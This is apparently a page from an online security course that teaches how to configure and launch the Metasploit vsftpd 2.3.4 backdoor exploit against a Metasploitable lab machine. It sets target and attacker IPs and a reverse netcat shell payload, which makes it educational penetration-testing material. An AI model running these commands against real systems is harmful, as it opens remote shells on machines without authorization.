Back to course

Using `msfconsole` II: Search and Use

Cyber Security Mastery: From Zero to Hero

Practical Metasploit Configuration

Continuing the workflow, after selecting an exploit, you must configure the parameters, especially the target and listening host.

Setting Required Options

Every exploit requires at least two critical variables to be set:

  1. RHOSTS (Remote Hosts): The IP address of the target machine.
  2. LHOST (Local Host): The IP address of the attacker (Kali Linux machine) where the reverse shell will connect back to.

Continuing the Example (attacking Metasploitable, IP 192.168.1.50):

msfconsole msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Set the target IP

msf6 exploit(...) > set RHOSTS 192.168.1.50

Set our Kali IP (attacker IP)

msf6 exploit(...) > set LHOST 192.168.1.10

Choose the payload (often automatically selected)

msf6 exploit(...) > show payloads msf6 exploit(...) > set PAYLOAD cmd/unix/reverse_netcat

Launch the exploit

msf6 exploit(...) > exploit